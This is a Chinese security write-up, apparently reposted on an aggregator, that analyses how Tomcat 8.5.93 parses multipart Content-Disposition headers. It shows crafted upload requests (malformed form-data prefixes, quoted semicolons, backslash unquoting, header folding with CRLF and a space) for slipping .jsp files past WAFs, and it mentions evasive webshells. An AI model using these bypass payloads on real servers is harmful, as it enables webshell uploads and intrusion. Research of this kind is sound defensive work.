【Tomcat文件上传】绕WAF姿势深入研究

news/2025/2/22 10:01:57/文章来源:https://www.cnblogs.com/o-O-oO/p/18725691

环境

本地环境tomcat8.5.93,无黑白名单限制

getSubmittedFileName()函数

tomcat可以通过filePart.getSubmittedFileName();获取上传文件的原始名filename

获取Content-Disposition头后,判断值是否form-data或attachment开头

然后112行将form-data; name="file"; filename="Test1.jsp"使用paramParser.parse()函数,将等于号=和分号;作为分割符进行分割

遇到等于号就进行赋值,等于号前面值为key,等于号后面到分号的值前面为value

然后会判断filename中是否存在\字符,并使用trim()除去空字符

最后获得一个Map

绕waf可利用点

1、getSubmittedFileName()函数在判断form-data位置,因为只是判断开头,后面可以随意构造form-dataaaaaaaaa

------WebKitFormBoundaryXWuXiFKBGGezJVGj
Content-Disposition: form-dataaaaaaaaa; name="file"; filename="Test1.jsp"
Content-Type: image/png123123231
------WebKitFormBoundaryXWuXiFKBGGezJVGj--

2、因为getSubmittedFileName()生成的map,所以Content-Disposition里参数可以随意变换位置或添加参数

------WebKitFormBoundaryXWuXiFKBGGezJVGj
Content-Disposition: form-dataaaaaaaaa; name="file"; asd="asd"; filename="Test1.jsp"
Content-Type: image/png123123231
------WebKitFormBoundaryXWuXiFKBGGezJVGj--

------WebKitFormBoundaryXWuXiFKBGGezJVGj
Content-Disposition: form-dataaaaaaaaa; filename="Test1.jsp"; name="file"; asd="asd";
Content-Type: image/png123123231
------WebKitFormBoundaryXWuXiFKBGGezJVGj--

3、Content-Disposition通过等于号和分号作为分割符,但是双引号里面的分号不会被解析

当遇到等于号时,使用parseQuotedToken()函数进行截断到下一个分号,然后赋值

跟进parseQuotedToken()函数里面可以看到

遇到双引号会导致后面的分号不会当作分割符,只有双数双引号结束后,后面分号才起作用

下面是双引号中分号失效

------WebKitFormBoundaryXWuXiFKBGGezJVGj
Content-Disposition: form-data; name="file"; filename="12;3.jsp"
Content-Type: image/png123123231
------WebKitFormBoundaryXWuXiFKBGGezJVGj--

下面是单个双引号后面的分号也会失效

------WebKitFormBoundaryXWuXiFKBGGezJVGj
Content-Disposition: form-data; name="file"; filename="12;3.jsp
Content-Type: image/png123123231
------WebKitFormBoundaryXWuXiFKBGGezJVGj--

但双引号被转译就不行了

------WebKitFormBoundaryXWuXiFKBGGezJVGj
Content-Disposition: form-data; name="file"; filename=\"12;3.jsp
Content-Type: image/png123123231
------WebKitFormBoundaryXWuXiFKBGGezJVGj--

4、按照分号分割符,filename内容会被解析到分号或换行

5、ch1ng和y4tacker师傅在之前提过一个好玩的地方

https://www.ch1ng.com/blog/264.htmlhttps://y4tacker.github.io/2022/06/19/year/2022/6/%E6%8E%A2%E5%AF%BBTomcat%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%B5%81%E9%87%8F%E5%B1%82%E9%9D%A2%E7%BB%95waf%E6%96%B0%E5%A7%BF%E5%8A%BF/

如果filename里面存在\字符,则会调用HttpParser.unquote()函数

上面师傅说的很清楚了,双引号开头会将转译符\屏蔽,并且长度往前走一位,filename=""Te\st1.png"会被解析成Test1.pn

-----------------------------6920084414045732195561853497
Content-Disposition: form-data; name="file"; filename=""Te\st.j\spa"
Content-Type: image/png123
-----------------------------6920084414045732195561853497--

-----------------------------6920084414045732195561853497
Content-Disposition: form-data; name="file"; filename="Te\st.j\spa
Content-Type: image/png123
-----------------------------6920084414045732195561853497--

Content-Disposition头解析

这姿势是在参加阿里云waf挑战赛和绕长亭雷池waf时发现的,最近有空跟进一下tomcat源码,具体的绕过poc就不公布了(放星球了)

正常文件上传时,tomcat会将multipart的内容进行解析,将下面部分解析成两个header头:
Content-Disposition和Content-Type

Content-Disposition: form-data; name="file"; filename="Test1.jsp";
Content-Type: image/png

正常上传

------WebKitFormBoundaryXWuXiFKBGGezJVGj
Content-Disposition: form-data; name="file"; filename="Test1.jsp"
aaa
Content-Type: image/png123123231
------WebKitFormBoundaryXWuXiFKBGGezJVGj--

可见cdl的值为

form-data; name="file"; filename="Test1.jsp"

如果Content-Disposition后面出现回车\r\n+空格

那么第二行的空格及后边内容将会被解析为Content-Disposition的值

//回车加空格
------WebKitFormBoundaryXWuXiFKBGGezJVGj
Content-Disposition: form-data; name="file"; filename="Test1.jsp"abcd
Content-Type: image/png123123231
------WebKitFormBoundaryXWuXiFKBGGezJVGj--

可见cdl的值为 form-data; name="file"; filename="Test1.jsp" abcd

此原因出现在tomcat对Content-Disposition的解析上

tomcat-coyote-8.5.93.jar!/org/apache/tomcat/util/http/fileupload/MultipartStream.class

源码中tomcat首先获取multipart中所有header信息,当遇到两次回车换行\r\n\r\n时截止

此时headers信息是:

Content-Disposition: form-data; name="file"; filename="Test1.jsp"\r\nContent-Type: image/png\r\n\r\n

然后将headers进行分割,遇到第一个回车换行\r\n后,进行字符串截断

此时header信息为

Content-Disposition: form-data; name="file"; filename="Test1.jsp"

紧接着会对下一个字符进行判断,如果不是空格 或 tab\t,则退出循环

tomcat-coyote-8.5.93.jar!/org/apache/tomcat/util/http/fileupload/FileUploadBase.class

此时生成俩header头

Content-Disposition: form-data; name="file"; filename="Test1.jsp"
Content-Type: image/png

但如果是空格 或tab\t,则将Content-Disposition值后面拼接空格再拼接到下一个换行回车之前的内容.

此时生成一个header头

Content-Disposition: form-data; name="file"; filename="Test1.jsp" Content-Type: image/png

这里还有一点,在parseEndOfLine函数进行分割头时,如果遇到单个\r或单个\n则也不会分割

只有遇到\r\n连起来时才分割

------WebKitFormBoundaryXWuXiFKBGGezJVGj
Content-Disposition: form-data; name="file"; filename="123.png"\r
Content-Type: image/png.jsp123123231
------WebKitFormBoundaryXWuXiFKBGGezJVGj--
------WebKitFormBoundaryXWuXiFKBGGezJVGj
Content-Disposition: form-data; name="file"; filename="123.png"\n
Content-Type: image/png.jsp123123231
------WebKitFormBoundaryXWuXiFKBGGezJVGj--

绕waf可利用点

1、回车后空格构造.jsp结尾

最好是用在上传后文件重命名的地方

-----------------------------6920084414045732195561853497
Content-Disposition: form-data; name="file"; filename="test.png"Content-Type: image/pnga.jsp123123231
-----------------------------6920084414045732195561853497--

2、单换行或单回车构造

-----------------------------6920084414045732195561853497
Content-Disposition: form-data; name="file"; filename="test.png"\n
Content-Type: image/png.jsp123123231
-----------------------------6920084414045732195561853497--

至于绕上传文件的内容,使用XG拟态生成免杀马,测试可过部分waf,其他需要去自己测试了

下面是雷池的SQL靶场,上传无拦截

参考🔗

https://www.ch1ng.com/blog/264.htmlhttps://y4tacker.github.io/2022/06/19/year/2022/6/%E6%8E%A2%E5%AF%BBTomcat%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%B5%81%E9%87%8F%E5%B1%82%E9%9D%A2%E7%BB%95waf%E6%96%B0%E5%A7%BF%E5%8A%BF/https://www.cnblogs.com/zpchcbd/p/17048404.html

原创 XG小刚

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/886997.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

关于一个手机控制电脑执行特定任务的解决方案探索【1】

【前言】 说来话长,关于这个手机控制电脑执行特定任务的想法早在几年前就有,但因为对安卓平台开发经验实在不足,就一直拖到了现在。不过好在没有忘记初衷,接下来我们一起来看我的思路和方法。 【思路】 想要通过手机作为控制端,来发送指令给同一网络下的电脑端,执行特定任…

如何升级 PowerShell 到最新版本

前言最近,需要大量使用PowerShell,然后有需要PowerShell 7正文升级的步骤也比较简单,按照下面的步骤就好了文字版本的,方便大家复制粘贴。PS C:\WINDOWS\system32> $PSVersionTable.PSVersionMajor Minor Build Revision ----- ----- ----- -------- 5 1 …

百万架构师第四十课:RabbitMq:RabbitMq-工作模型与JAVA编程|JavaGuide

来源:https://javaguide.net RabbitMQ 1-工作模型与Java编程 课前准备 预习资料 Windows安装步骤 Linux安装步骤 官网文章中文翻译系列 环境说明 操作系统:CentOS 7 JDK:1.8 Erlang:19.0.4或最新版 RabbitMQ:3.6.12或最新版 版本对应关系 典型应用场景跨系统的异步通信。人…

1月16日java假期学习读书笔记

一、学习目标 掌握HTML的基本结构和常用标签。 了解CSS的基本选择器和样式规则。 通过实际代码练习,构建一个简单的网页。 二、学习内容 (一)HTML基础 HTML简介 HTML(HyperText Markup Language,超文本标记语言)是用于构建网页的标准标记语言。 它通过一系列的标签(如、…

MapStruct使用指南并结合Lombok

MapStruct使用指南并结合Lombokhttps://juejin.cn/post/6956190395319451679#heading-1 2024-01-11 18:34:06如何结合 lombok 也就说说如果代码中使用了 lombok 注解来生成代码,mapstruct 的 getter/setter 方法也使用了 lombok 的 api,那就需要额外的配置,因为这两个工具都是使…

史上最全桌面级CPU天梯图-2024年10月更新(包含13/14代Intel/7000系列锐龙)

史上最全桌面级CPU天梯图-2024年10月更新(包含13/14代Intel/7000系列锐龙) 原文:https://www.zhihu.com/tardis/bd/art/499783467?source_id=1001

large_bin_attack

large_bin的结构如下 /*This struct declaration is misleading (but accurate and necessary).It declares a "view" into memory allowing access to necessaryfields at known offsets from a given base. See explanation below. */ struct malloc_chunk {INTERN…

体验用ai做了个python小游戏

写在前面:最近ai确实比较火。各种生成式AI,包括文字、图片、视频。之前听说ai生产代码能力比较强,一直想试试。所以及就有了本问。使用的工具deepinseek :用来生成python代码即梦:用来生成图片素材Remove.bg:用来对生成的图片素材去除背景pixabay.com:用来下载音乐素材游…

2.1.5 节省内存

首先来介绍一下可变对象和不可变对象可变对象:整数,浮点数,字符串,元组等 不可变对象:列表,字典,集合等然后看一下Python中内存分配的方式 执行x=1会发生什么?此时,内存会分配一个地址给1,1是一个整型对象,而x是一个引用(不是对象!),指向1所在的位置,并不占用实…

ABC392E翻译

AT_abc392_e [ABC392E] Cables and Servers 题目描述 有编号从 \(1\) 到 \(N\) 的 \(N\) 台服务器和编号从 \(1\) 到 \(M\) 的 \(M\) 根电缆。 电缆 \(i\) 双向连接服务器 \(A_i\) 和服务器 \(B_i\)。 通过进行以下操作(可以是 \(0\) 次),使得所有服务器之间都能通过电缆相互…

【外贸】集装箱的规格

集装箱类型(以米为单位)集装箱类型 外部尺寸(长宽高) 内部尺寸(长宽高) 容积(立方米) 载重(公斤)20英尺标准集装箱 6.1m 2.44m 2.59m 5.9m 2.35m 2.39m 33 28,00040英尺标准集装箱 12.2m 2.44m 2.59m 12m 2.35m 2.39m 67 26,50040英尺高柜集装箱 12.2m 2.44…